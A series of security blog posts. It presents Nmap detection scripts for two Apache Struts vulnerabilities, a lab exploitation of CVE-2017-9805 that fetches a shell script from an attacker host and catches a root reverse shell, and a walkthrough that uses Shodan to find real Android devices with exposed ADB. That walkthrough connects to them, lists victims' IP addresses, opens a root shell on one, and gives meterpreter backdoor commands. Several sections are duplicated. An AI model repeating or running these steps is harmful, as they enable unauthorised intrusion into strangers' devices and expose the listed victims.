Here is another Nmap NSE script I wrote to detect this vulnerability. The script is very simple, I send a simple math operand ${1+1} in a vulnerable url, eg. http://victim.com/${1+1}/help.action and if the host replies with a Header "Location: /2/help.action" that means this host is vulnerable. For this script, I generated random digits and sum it up, if the resulting 302 Redirect sum matches in the Location header, then it's a vulnerable host.
There are a few exploits in the wild for this vulnerability but none written for Nmap NSE Enumeration. I'm pretty sure this sort of code will be useful for other pen-testers out there. I had submitted it to Github via a Pull Request, lets see if my code makes it to the master branch soon. The output of a positive detection is as follows:
$ sudo nmap --script ./http-vuln-cve2018-11776 127.0.0.1 -p 8080 -n --script-args url=/
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-07 00:37 +08
Nmap scan report for 127.0.0.1
Host is up (0.000090s latency).
PORT STATE SERVICE
8080/tcp open http-proxy
| http-vuln-cve2018-11776:
| VULNERABLE:
| Apache Struts 2 Namespace Redirect OGNL Injection
| State: VULNERABLE
| IDs: CVE:CVE-2018-11776
| Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true
| (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard
| namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no
| or wildcard namespace.
|
| Disclosure date: 2018-08-22
| References:
| https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
| https://lgtm.com/blog/apache_struts_CVE-2018-11776
| https://cwiki.apache.org/confluence/display/WW/S2-057
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Reverse Engineering
$ sudo docker container run -it --rm -p 8080:8080 struts2
$ sudo docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
3ff6c242970b struts2 "catalina.sh run" 9 seconds ago Up 8 seconds 0.0.0.0:8080->8080/tcp nifty_varahamihira
Then I ran a couple of exploits and detection scripts to reverse engineer the code and using Wireshark to analyse the HTTP traffic.
$ ./exploitS2-057-test.py http://127.0.0.1:8080/showcase.action
testing the url for exploit; http://127.0.0.1:8080/${16074+35045}/help.action
URL http://127.0.0.1:8080/showcase.action s2-057 CVE-2018-11776 is vulnerable!
Putting It Together
Once I have an understanding of how the exploits work, it was just a matter of porting it to LUA scripting language, which I know jack shit! So it took me a few hours of hacking to get a dirty code up and running.
Tuesday, February 5, 2019
Detecting Apache Struts S2-052
Introduction
Here's a Nmap NSE script I wrote to detect the 2nd variant of Apache Struts REST Plugin XStream Remote Code Execution Vulnerability, CVE-2017-9805. Script is downloadable here. This was one of the infamous vulnerability that hit Equifax in 2017. The one that hit them was the 1st variant, CVE-2017-5638. Since there wasn't a NSE script to detect the 2nd variant, I decided to write my own.
Sample output:
$ sudo nmap -n --script ./http-vuln-cve2017-9805 -p 80 ptl-41af4f81-e25cbf8e.libcurl.so --script-args=/ -sSV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-05 17:22 +08
Nmap scan report for ptl-41af4f81-e25cbf8e.libcurl.so (104.131.54.221)
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
| http-vuln-cve2017-9805:
| VULNERABLE:
| Apache Struts REST Plugin XStream RCE
| State: VULNERABLE
| IDs: CVE:CVE-2017-9805
| The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for
| deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads
|
| Disclosure date: 2017-09-15
| References:
| https://www.r00tpgp.com/2019/02/detecting-apache-struts-s2-052.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
| https://cwiki.apache.org/confluence/display/WW/S2-052
|_ https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds
Code
The code is pretty simple, the magic happens on line no 67 and 80:
On line 67, contains the payload, an exploit would usually have the evil cmd inserted here. Since this is just a detection script, there is no need for it. If vulnerable, the server will respond with HTTP 200 stack trace dump containing key words such as "org.apache.struts2.rest.handler.XStreamHandler.toObject". Line no 80 does a comparison operator agaisnt the http response for the matching string. This is is the indicator that the host is running Apache Struts2 XStreamHandler object and very likely to be vulnerable to RCE.
For testing purposes, you can download a vulnerable docker here.
$ sudo docker pull medicean/vulapps:s_struts2_s2-052
s_struts2_s2-052: Pulling from medicean/vulapps
8ad8b3f87b37: Pull complete
751fe39c4d34: Pull complete
b165e84cccc1: Pull complete
acfcc7cbc59b: Pull complete
04b7a9efc4af: Pull complete
b16e55fe5285: Pull complete
8c5cbb866b55: Pull complete
96290882cd1b: Pull complete
85852deeb719: Pull complete
ff68ba87c7a1: Pull complete
584acdc953da: Pull complete
dd3a387a5bb7: Pull complete
d7cf4f910c29: Pull complete
c181fe02fed0: Pull complete
d2d0ca101682: Pull complete
Digest: sha256:fda2fe3b6df63b95d0e258d0f2822282fb627df7bf86e09c31a76b1a56403130
Status: Downloaded newer image for medicean/vulapps:s_struts2_s2-052
Exploitation
For testing purposes, you can download a vulnerable docker here.
$ sudo docker pull medicean/vulapps:s_struts2_s2-052
s_struts2_s2-052: Pulling from medicean/vulapps
8ad8b3f87b37: Pull complete
751fe39c4d34: Pull complete
b165e84cccc1: Pull complete
acfcc7cbc59b: Pull complete
04b7a9efc4af: Pull complete
b16e55fe5285: Pull complete
8c5cbb866b55: Pull complete
96290882cd1b: Pull complete
85852deeb719: Pull complete
ff68ba87c7a1: Pull complete
584acdc953da: Pull complete
dd3a387a5bb7: Pull complete
d7cf4f910c29: Pull complete
c181fe02fed0: Pull complete
d2d0ca101682: Pull complete
Digest: sha256:fda2fe3b6df63b95d0e258d0f2822282fb627df7bf86e09c31a76b1a56403130
Status: Downloaded newer image for medicean/vulapps:s_struts2_s2-052
$ sudo docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-052
ebcfc7292899201c56dee30f8bec934d271a7c93e504cc33d7f451642aae0616
Check if its up:
$ sudo docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
ebcfc7292899 medicean/vulapps:s_struts2_s2-052 "/usr/local/tomcat/b…" 12 seconds ago Up 9 seconds 0.0.0.0:80->8080/tcp upbeat_visvesvaraya
Great! Now let's see if my NSE script works:
$ sudo nmap --script http-vuln-cve2017-9805.nse localhost --script-args path=/orders -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-09 16:18 +08
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00010s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
80/tcp open http
| http-vuln-cve2017-9805:
| VULNERABLE:
| Apache Struts REST Plugin XStream RCE
| State: VULNERABLE
| IDs: CVE:CVE-2017-9805
| The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for
| deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads
|
| Disclosure date: 2017-09-15
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
| https://www.r00tpgp.com/2019/02/detecting-apache-struts-s2-052.html
| https://cwiki.apache.org/confluence/display/WW/S2-052
|_ https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement
Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
Bang! The vulnerability was detected, now let's download the exploit for cve-2017-9805 and pwn this box:
$ wget https://raw.githubusercontent.com/mazen160/struts-pwn_CVE-2017-9805/master/struts-pwn.py
--2019-02-09 16:21:39-- https://raw.githubusercontent.com/mazen160/struts-pwn_CVE-2017-9805/master/struts-pwn.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.76.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.76.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13843 (14K) [text/plain]
Saving to: ‘struts-pwn.py’
struts-pwn.py 100%[===========================================================================================>] 13.52K --.-KB/s in 0.09s
2019-02-09 16:21:40 (144 KB/s) - ‘struts-pwn.py’ saved [13843/13843]
This exploit is a bit weird, I can't chain it in a oneliner so I had to do it step by step, first we download the bash shell from my host:
$ ./struts-pwn.py -u http://localhost/orders -c "wget http://192.168.43.216:81/shell.sh -O /tmp/shell.sh" --exploit
[*] URL: http://localhost/orders
[*] CMD: wget http://192.168.43.216:81/shell.sh -O /tmp/shell.sh
[$] Request sent.
[.] If the host is vulnerable, the command will be executed in the background.
[%] Done.
On my machine, I run simple HTTP server using python, I know I got RCE since the victim connected to download the shell:
$ sudo python -m SimpleHTTPServer 81
Serving HTTP on 0.0.0.0 port 81 ...
172.17.0.2 - - [09/Feb/2019 17:00:19] "GET /shell.sh HTTP/1.1" 200 -
Its time to execute the exploit on the target:
$ ./struts-pwn.py -u http://localhost/orders -c "bash /tmp/shell.sh" --exploit
[*] URL: http://localhost/orders
[*] CMD: bash /tmp/shell.sh
[$] Request sent.
[.] If the host is vulnerable, the command will be executed in the background.
[%] Done.
Finally, my netcat listener should pick it up, always remember to run this before you execute the exploit:
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.43.216] from (UNKNOWN) [172.17.0.2] 40786
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@ebcfc7292899:/tmp# uname -a
uname -a
Linux ebcfc7292899 4.18.0-kali3-amd64 #1 SMP Debian 4.18.20-2kali2 (2018-11-30) x86_64 GNU/Linux
root@ebcfc7292899:/tmp#
Summary
There you go folks, I just showed you how I wrote a Nmap NSE script to detect this vulnerability, setup a vulnerable docker image and exploit the vulnerability step by step, there are easier ways I am sure, just use burpsuite to POST the vulnerable code to the target instead of having to blindly execute the exploit script multiple times. Always understand how the exploit works and what you are doing, break down the steps in smaller steps until you get the desired results.
Saturday, February 2, 2019
How To Pwn 100 Android Boxes
Background
Back in 2018, there were reports that many Android IoT manufacturers were shipping Android TV boxes with ADB Debug Bridge activated by default. When such devices are connected to the Internet, by default it listens on port 5555/tcp. This is due to a manufacturer misconfiguration. The feature is supposed to be only used by developers to remotely debug Android apps, there is no reason why it should be turned ON in the first place. If left in the wrong hands, a hacker can remotely install, take screenshots, turn on webcams, download and upload apps to vulnerable devices. Furthermore, some devices were pre-rooted, hence, a hacker can escalate to root using "su -" without password. It is so easy to exploit, there are several Monero mining bots exploiting this vulnerability in the wild.
Purpose
What I am about to show you is how to pwn 100 of these devices in under 10mins. This is merely for demo purposes and I will not be held responsible for any misuse or unlawful activities. I do not condone any activities that are against the Law. Do note that I did not run anything malicious on the vulnerable targets, I will leave the evil bits for your moral judgment to decide upon. So please be reminded this is purely for EDUCATIONAL PURPOSES ONLY.
Target Recon With Shodan.io
1. Using Shodan API, you can download vulnerable targets, over here I am using shodan python API script to query for 100 vulnerable Android devices:
$ shodan download --limit 100 shodan-adb.txt Android Debug Bridge
Search query: Android Debug Bridge
Total number of results: 21134
Query credits left: 100
Output file: shodan-adb.txt.json.gz
[###################################-] 99% 00:00:02
Saved 100 results into file shodan-adb.txt.json.gz
1a. The output is by default in json format:
$ zcat shodan-adb.txt.json.gz
{"_shodan": {"id": "19e30085-0185-4a04-a3e1-bc360e51a992", "options": {}, "ptr": true, "module": "http-simple-new", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "prod
uct": "Android Debug Bridge", "hash": -527783761, "os": null, "opts": {"raw": "434e584e000000010010000069000000d7260000bcb1a7b16465766963653a3a726f2e70726f647563742e6e616d653d74
61696d656e3b726f2e70726f647563742e6d6f64656c3d504958454c203220584c3b726f2e70726f647563742e6465766963653d7461696d656e3b66656174757265733d636d642c7368656c6c5f7632"}, "ip": 3552705
273, "isp": "Korea Telecom", "http": {"robots_hash": null, "redirects": [], "securitytxt": null, "title": null, "sitemap_hash": null, "robots": null, "server": null, "host": "21
1.193.250.249", "html": null, "location": "/", "html_hash": null, "sitemap": null, "securitytxt_hash": null}, "port": 5555, "hostnames": [], "location": {"city": "Jeju", "region
_code": "01", "area_code": null, "longitude": 126.53930000000003, "country_code3": "KOR", "country_name": "Korea, Republic of", "postal_code": null, "dma_code": null, "country_c
ode": "KR", "latitude": 33.45580000000001}, "timestamp": "2019-02-01T15:16:24.994715", "domains": [], "org": "Korea Telecom", "data": "Android Debug Bridge\nName: taimen\nModel:
PIXEL 2 XL\nDevice: taimen\n", "asn": "AS4766", "transport": "tcp", "ip_str": "211.193.250.249"}
{"_shodan": {"id": "22de199d-d671-451b-8880-96c8fe411e4f", "options": {}, "ptr": true, "module": "http-simple-new", "crawler": "5faf2928ceb560cb4276cc1b4660b2d763cc6397"}, "prod
uct": "Android Debug Bridge", "hash": -748033244, "os": null, "opts": {"raw": "434e584e000000010010000059000000001f0000bcb1a7b16465766963653a3a726f2e70726f647563742e6e616d653d6d
3230315f3531326d3b726f2e70726f647563742e6d6f64656c3d536d6172745f54563b726f2e70726f647563742e6465766963653d6d3230315f3531326d3b00"}, "ip": 3201925557, "isp": "Telefonica del Sur
S.A.", "http": {"robots_hash": null, "redirects": [], "securitytxt": null, "title": null, "sitemap_hash": null, "robots": null, "server": null, "host": "190.217.129.181", "html"
: null, "location": "/", "html_hash": null, "sitemap": null, "securitytxt_hash": null}, "port": 5555, "hostnames": [], "location": {"city": "Villarrica", "region_code": "04", "a
rea_code": null, "longitude": -72.2167, "country_code3": "CHL", "country_name": "Chile", "postal_code": null, "dma_code": null, "country_code": "CL", "latitude": -39.26669999999
9986}, "timestamp": "2019-02-01T15:15:08.823312", "domains": [], "org": "Telefonica del Sur S.A.", "data": "Android Debug Bridge\nName: m201_512m\nModel: Smart_TV\nDevice: m201_
512m\n", "asn": "AS14117", "transport": "tcp", "ip_str": "190.217.129.181"}
$ shodan parse --fields ip_str shodan-adb.txt.json.gz > shodan-adb.txt
$ cat shodan-adb.txt
211.193.250.249
190.217.129.181
211.104.178.191
118.161.216.47
24.222.139.184
183.151.182.140
175.125.24.143
114.37.207.133
218.191.106.190
220.118.42.222
113.254.141.47
1.163.112.179
91.247.107.164
...
...
blah
blah
2. The targets are probably home devices, therefore, very likely to be on dynamic ip address. To ensure that these targets are still alive and listening on port 5555, I like to Nmap them one more time:
$ nmap -iL shodan-adb.txt -p 5555 -n -oG adb-alive
$ cat adb-alive
# Nmap 7.70 scan initiated Fri Feb 1 23:25:02 2019 as: nmap -iL shodan-adb.csv -p 5555 -n -oG adb-alive
Host: 190.217.129.181 () Status: Up
Host: 190.217.129.181 () Ports: 5555/open/tcp//freeciv///
Host: 118.161.216.47 () Status: Up
Host: 118.161.216.47 () Ports: 5555/open/tcp//freeciv///
Host: 24.222.139.184 () Status: Up
Host: 24.222.139.184 () Ports: 5555/open/tcp//freeciv///
Host: 175.125.24.143 () Status: Up
Host: 175.125.24.143 () Ports: 5555/open/tcp//freeciv///
Host: 218.191.106.190 () Status: Up
Host: 218.191.106.190 () Ports: 5555/open/tcp//freeciv///
Host: 113.254.141.47 () Status: Up
Host: 113.254.141.47 () Ports: 5555/open/tcp//freeciv///
Host: 91.247.107.164 () Status: Up
Host: 91.247.107.164 () Ports: 5555/open/tcp//freeciv///
Host: 49.72.210.171 () Status: Up
Host: 49.72.210.171 () Ports: 5555/open/tcp//freeciv///
Host: 114.39.245.43 () Status: Up
1. Before I connect to the targets, I need to format it a bit, so some awk magic should do the trick ;-)
$cat adb-alive | grep "5555/open" | awk {'print "adb connect " $2":5555"'} > run-adb-connect.sh
$ cat run-adb-connect.sh
adb connect 190.217.129.181:5555
adb connect 118.161.216.47:5555
adb connect 24.222.139.184:5555
adb connect 175.125.24.143:5555
adb connect 218.191.106.190:5555
adb connect 113.254.141.47:5555
adb connect 91.247.107.164:5555
adb connect 49.72.210.171:5555
adb connect 114.39.245.43:5555
adb connect 178.163.11.211:5555
adb connect 203.115.98.94:5555
adb connect 14.136.53.43:5555
adb connect 190.95.46.226:5555
adb connect 212.75.143.220:5555
adb connect 83.209.25.67:5555
adb connect 211.215.164.133:5555
adb connect 213.113.235.218:5555
adb connect 121.34.28.60:5555
adb connect 117.215.191.170:5555
adb connect 121.202.94.21:5555
adb connect 186.95.32.108:5555
adb connect 222.117.48.55:5555
adb connect 61.74.128.26:5555
3. Cool! Loads of targets connected. Now, lets check our loot:
5. W00t! We already got r00t on one target. If you are smart, you can script this command further to hunt for more r00ted devices.
Backdooring with Metepreter
3. Start msfconsole listener:
4. Start the meterpreter shell:
Summary
There are many evil commands can be executed using adb. Just refer to https://developer.android.com/studio/command-line/adb. You can practically do anything to the android box since you are root. The great part about 0wning Android devices is that you don't have to deal with Anti-Viruses, as hardly anyone installs it on mobile devices.
References
https://www.bleepingcomputer.com/news/security/tens-of-thousands-of-android-devices-are-exposing-their-debug-port/
https://forum.xda-developers.com/android/software/guide-installing-adb-fastboot-linux-adb-t3478678
https://futurestud.io/tutorials/how-to-debug-your-android-app-over-wifi-without-root
https://medium.com/@madrobot/exploiting-android-devices-running-insecure-remote-adb-service-4490cc6a2282
https://resources.infosecinstitute.com/lab-android-exploitation-with-kali/#gref
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md
Back in 2018, there were reports that many Android IoT manufacturers were shipping Android TV boxes with ADB Debug Bridge activated by default. When such devices are connected to the Internet, by default it listens on port 5555/tcp. This is due to a manufacturer misconfiguration. The feature is supposed to be only used by developers to remotely debug Android apps, there is no reason why it should be turned ON in the first place. If left in the wrong hands, a hacker can remotely install, take screenshots, turn on webcams, download and upload apps to vulnerable devices. Furthermore, some devices were pre-rooted, hence, a hacker can escalate to root using "su -" without password. It is so easy to exploit, there are several Monero mining bots exploiting this vulnerability in the wild.
Purpose
What I am about to show you is how to pwn 100 of these devices in under 10mins. This is merely for demo purposes and I will not be held responsible for any misuse or unlawful activities. I do not condone any activities that are against the Law. Do note that I did not run anything malicious on the vulnerable targets, I will leave the evil bits for your moral judgment to decide upon. So please be reminded this is purely for EDUCATIONAL PURPOSES ONLY.
Target Recon With Shodan.io
1. Using Shodan API, you can download vulnerable targets, over here I am using shodan python API script to query for 100 vulnerable Android devices:
$ shodan download --limit 100 shodan-adb.txt Android Debug Bridge
Search query: Android Debug Bridge
Total number of results: 21134
Query credits left: 100
Output file: shodan-adb.txt.json.gz
[###################################-] 99% 00:00:02
Saved 100 results into file shodan-adb.txt.json.gz
1a. The output is by default in json format:
$ zcat shodan-adb.txt.json.gz
{"_shodan": {"id": "19e30085-0185-4a04-a3e1-bc360e51a992", "options": {}, "ptr": true, "module": "http-simple-new", "crawler": "d264629436af1b777b3b513ca6ed1404d7395d80"}, "prod
uct": "Android Debug Bridge", "hash": -527783761, "os": null, "opts": {"raw": "434e584e000000010010000069000000d7260000bcb1a7b16465766963653a3a726f2e70726f647563742e6e616d653d74
61696d656e3b726f2e70726f647563742e6d6f64656c3d504958454c203220584c3b726f2e70726f647563742e6465766963653d7461696d656e3b66656174757265733d636d642c7368656c6c5f7632"}, "ip": 3552705
273, "isp": "Korea Telecom", "http": {"robots_hash": null, "redirects": [], "securitytxt": null, "title": null, "sitemap_hash": null, "robots": null, "server": null, "host": "21
1.193.250.249", "html": null, "location": "/", "html_hash": null, "sitemap": null, "securitytxt_hash": null}, "port": 5555, "hostnames": [], "location": {"city": "Jeju", "region
_code": "01", "area_code": null, "longitude": 126.53930000000003, "country_code3": "KOR", "country_name": "Korea, Republic of", "postal_code": null, "dma_code": null, "country_c
ode": "KR", "latitude": 33.45580000000001}, "timestamp": "2019-02-01T15:16:24.994715", "domains": [], "org": "Korea Telecom", "data": "Android Debug Bridge\nName: taimen\nModel:
PIXEL 2 XL\nDevice: taimen\n", "asn": "AS4766", "transport": "tcp", "ip_str": "211.193.250.249"}
{"_shodan": {"id": "22de199d-d671-451b-8880-96c8fe411e4f", "options": {}, "ptr": true, "module": "http-simple-new", "crawler": "5faf2928ceb560cb4276cc1b4660b2d763cc6397"}, "prod
uct": "Android Debug Bridge", "hash": -748033244, "os": null, "opts": {"raw": "434e584e000000010010000059000000001f0000bcb1a7b16465766963653a3a726f2e70726f647563742e6e616d653d6d
3230315f3531326d3b726f2e70726f647563742e6d6f64656c3d536d6172745f54563b726f2e70726f647563742e6465766963653d6d3230315f3531326d3b00"}, "ip": 3201925557, "isp": "Telefonica del Sur
S.A.", "http": {"robots_hash": null, "redirects": [], "securitytxt": null, "title": null, "sitemap_hash": null, "robots": null, "server": null, "host": "190.217.129.181", "html"
: null, "location": "/", "html_hash": null, "sitemap": null, "securitytxt_hash": null}, "port": 5555, "hostnames": [], "location": {"city": "Villarrica", "region_code": "04", "a
rea_code": null, "longitude": -72.2167, "country_code3": "CHL", "country_name": "Chile", "postal_code": null, "dma_code": null, "country_code": "CL", "latitude": -39.26669999999
9986}, "timestamp": "2019-02-01T15:15:08.823312", "domains": [], "org": "Telefonica del Sur S.A.", "data": "Android Debug Bridge\nName: m201_512m\nModel: Smart_TV\nDevice: m201_
512m\n", "asn": "AS14117", "transport": "tcp", "ip_str": "190.217.129.181"}
....
..
blah
blah
2. Let's parse them into a readable format:
$ cat shodan-adb.txt
211.193.250.249
190.217.129.181
211.104.178.191
118.161.216.47
24.222.139.184
183.151.182.140
175.125.24.143
114.37.207.133
218.191.106.190
220.118.42.222
113.254.141.47
1.163.112.179
91.247.107.164
...
...
blah
blah
2. The targets are probably home devices, therefore, very likely to be on dynamic ip address. To ensure that these targets are still alive and listening on port 5555, I like to Nmap them one more time:
$ nmap -iL shodan-adb.txt -p 5555 -n -oG adb-alive
$ cat adb-alive
# Nmap 7.70 scan initiated Fri Feb 1 23:25:02 2019 as: nmap -iL shodan-adb.csv -p 5555 -n -oG adb-alive
Host: 190.217.129.181 () Status: Up
Host: 190.217.129.181 () Ports: 5555/open/tcp//freeciv///
Host: 118.161.216.47 () Status: Up
Host: 118.161.216.47 () Ports: 5555/open/tcp//freeciv///
Host: 24.222.139.184 () Status: Up
Host: 24.222.139.184 () Ports: 5555/open/tcp//freeciv///
Host: 175.125.24.143 () Status: Up
Host: 175.125.24.143 () Ports: 5555/open/tcp//freeciv///
Host: 218.191.106.190 () Status: Up
Host: 218.191.106.190 () Ports: 5555/open/tcp//freeciv///
Host: 113.254.141.47 () Status: Up
Host: 113.254.141.47 () Ports: 5555/open/tcp//freeciv///
Host: 91.247.107.164 () Status: Up
Host: 91.247.107.164 () Ports: 5555/open/tcp//freeciv///
Host: 49.72.210.171 () Status: Up
Host: 49.72.210.171 () Ports: 5555/open/tcp//freeciv///
Host: 114.39.245.43 () Status: Up
...
....
...
blah
blah..
Connecting via ADB to port 5555
1. Before I connect to the targets, I need to format it a bit, so some awk magic should do the trick ;-)
$cat adb-alive | grep "5555/open" | awk {'print "adb connect " $2":5555"'} > run-adb-connect.sh
$ cat run-adb-connect.sh
adb connect 190.217.129.181:5555
adb connect 118.161.216.47:5555
adb connect 24.222.139.184:5555
adb connect 175.125.24.143:5555
adb connect 218.191.106.190:5555
adb connect 113.254.141.47:5555
adb connect 91.247.107.164:5555
adb connect 49.72.210.171:5555
adb connect 114.39.245.43:5555
adb connect 178.163.11.211:5555
adb connect 203.115.98.94:5555
adb connect 14.136.53.43:5555
adb connect 190.95.46.226:5555
adb connect 212.75.143.220:5555
adb connect 83.209.25.67:5555
adb connect 211.215.164.133:5555
adb connect 213.113.235.218:5555
adb connect 121.34.28.60:5555
adb connect 117.215.191.170:5555
adb connect 121.202.94.21:5555
adb connect 186.95.32.108:5555
adb connect 222.117.48.55:5555
adb connect 61.74.128.26:5555
.....
..
blah
blah.
2. OK, now that everything is ready, it is time to execute my script to connect to the targets
blah
./run-adb-connect.sh
already connected to 190.217.129.181:5555
connected to 118.161.216.47:5555
connected to 24.222.139.184:5555
connected to 175.125.24.143:5555
connected to 218.191.106.190:5555
connected to 113.254.141.47:5555
connected to 91.247.107.164:5555
connected to 49.72.210.171:5555
connected to 114.39.245.43:5555
connected to 178.163.11.211:5555
connected to 203.115.98.94:5555
connected to 14.136.53.43:5555
connected to 190.95.46.226:5555
connected to 212.75.143.220:5555
connected to 83.209.25.67:5555
connected to 211.215.164.133:5555
connected to 213.113.235.218:5555
connected to 121.34.28.60:5555
connected to 117.215.191.170:5555
connected to 121.202.94.21:5555
connected to 186.95.32.108:5555
connected to 222.117.48.55:5555
connected to 61.74.128.26:5555
connected to 180.231.9.40:5555
connected to 123.202.214.136:5555
connected to 112.119.26.150:5555
connected to 3.87.24.81:5555
connected to 110.12.38.184:5555
....
..
blah3. Cool! Loads of targets connected. Now, lets check our loot:
$ adb devices -l
List of devices attached
175.123.154.132:5555 device product:BHX-S100 model:BHX_S100 device:BHX-S100 transport_id:48
14.45.245.156:5555 device product:SM-G930S model:SM_G930S device:x86 transport_id:47
218.250.50.75:5555 device product:mars_a31s model:Q_BOX_02 device:mars-a31s transport_id:46
190.73.138.178:5555 device product:android_x86 model:Intel_powered_classmate_PC device:x86 transport_id:45
41.77.214.61:5555 device product:CVTE_MSD338_512M_PC821 model:CVTE_MSD338_512M device:CVTE_MSD338_512M_PC821 transport_id:44
93.7.87.40:5555 device product:rk322x_box model:HK1_MINI device:rk322x_box transport_id:43
121.132.211.218:5555 device product:Hi3796MV100 model:Hi3796MV100 device:Hi3796MV100 transport_id:42
110.12.38.184:5555 device product:p20x model:TV006 device:kiii_2g transport_id:41
3.87.24.81:5555 device product:cloud model:Genymotion__Phone__version device:cloud transport_id:40
112.119.26.150:5555 device product:dolphin_fvd_p1 model:Global_Edition_S800 device:dolphin-fvd-p1 transport_id:39
123.202.214.136:5555 device product:rk3328_box model:BOSSTV_V2 device:rk3328_box transport_id:38
180.231.9.40:5555 device product:tvg2a model:S60UPI device:tvg2a transport_id:37
61.74.128.26:5555 device product:android_x86 model:Default_string device:x86 transport_id:36
222.117.48.55:5555 device product:ja3gxx model:GT_I9500 device:ja3g transport_id:35
186.95.32.108:5555 device product:android_x86 model:H61H2_CM device:x86 transport_id:34
121.202.94.21:5555 device product:msm8909 model:N5 device:msm8909 transport_id:33
117.215.191.170:5555 device product:hlteuc model:SAMSUNG_SM_N900A device:hlteatt transport_id:32
121.34.28.60:5555 device product:rk3328_box model:L1PRO device:rk3328_box transport_id:31
213.113.235.218:5555 device product:rk322x_box model:AILETV device:rk322x_box transport_id:30
211.215.164.133:5555 device product:petrel_fvd_p1 model:EVPAD_3PRO device:petrel-p1 transport_id:29
83.209.25.67:5555 device product:p201 model:MXQ_Pro device:p201 transport_id:28
212.75.143.220:5555 device product:rk322x_box model:TTK_Box_214 device:rk322x transport_id:27
190.95.46.226:5555 device product:aosp_cranberry model:SMART device:cranberry transport_id:26
14.136.53.43:5555 device product:mars_a31s model:Q_BOX_02 device:mars-a31s transport_id:25
203.115.98.94:5555 device product:QezyTV Remotely Managed STB model:HD700 device:QezyTV transport_id:24
178.163.11.211:5555 device product:NV501WAC model:NV501WAC device:NV501WAC transport_id:23
114.39.245.43:5555 device product:ghost_retasia model:XT1052 device:ghost transport_id:22
49.72.210.171:5555 device product:MagicBox_M16C model:MagicBox_M16C device:MagicBox_M16C transport_id:21
91.247.107.164:5555 device product:g18ref model:Android_TV device:g18ref transport_id:20
113.254.141.47:5555 device product:mars_a31s512m model:Quad_Core device:mars-a31s512m transport_id:19
218.191.106.190:5555 device product:VIDAA_TV model:VIDAA_TV device:Hi3751 transport_id:18
...
..
blah
blah.
4. As you can see, there are tons of vulnerable Android boxes out there :-) Lets connect to one target that appears to be a Samsung S7 phone:
$ adb -s 14.45.245.156 shell
root@x86:/ # id
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
root@x86:/ # uname -a
Linux localhost 4.0.9-android-x86 #1 SMP PREEMPT Wed Oct 25 02:01:32 PDT 2017 i686 GNU/Linux
root@x86:/ # uptime
up time: 09:55:06, idle time: 06:30:03, sleep time: 00:00:00
root@x86:/ # df
Filesystem Size Used Free Blksize
/ 501.6M 2.4M 499.2M 4096
/dev 502.4M 32.0K 502.4M 4096
/sys/fs/cgroup 502.4M 12.0K 502.4M 4096
/system 591.2M 447.0M 144.2M 4096
/cache 369.5M 212.0K 369.3M 4096
/data 11.4G 3.9G 7.6G 4096
/mnt/asec 502.4M 0.0K 502.4M 4096
/mnt/obb 502.4M 0.0K 502.4M 4096
/mnt/temp 502.4M 8.0K 502.4M 4096
/mnt/shared/Applications 48.8G 35.6G 13.2G 4096
/mnt/shared/Pictures 48.8G 35.6G 13.2G 4096
/mnt/shared/Misc 48.8G 35.6G 13.2G 4096
/mnt/shared/Bug 48.8G 35.6G 13.2G 4096
/data/media/0/Applications 48.8G 35.6G 13.2G 4096
/data/media/0/Pictures 48.8G 35.6G 13.2G 4096
/data/media/0/Misc 48.8G 35.6G 13.2G 4096
/mnt/shell/emulated 11.4G 3.9G 7.6G 4096
root@x86:/ # >
5. W00t! We already got r00t on one target. If you are smart, you can script this command further to hunt for more r00ted devices.
Backdooring with Metepreter
Optionally, you can generate your own Meterpreter shell and upload it to the victims, though I feel this is a waste of time as adb provides way more cool/evil features:
1. Gen meterpreter payload:
2. Upload it to targets:
1. Gen meterpreter payload:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<YOUR IP> LPORT=4444 -f raw -o android.apk
$ adb -s <TARGET IP>:5555 install android.apk
# msfconsole
use exploit/multi/hander
use payload android/meterpreter/reverse_tcp
set LHOST xxxxxx
set LPORT xxxxxx
run
$ adb shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
Summary
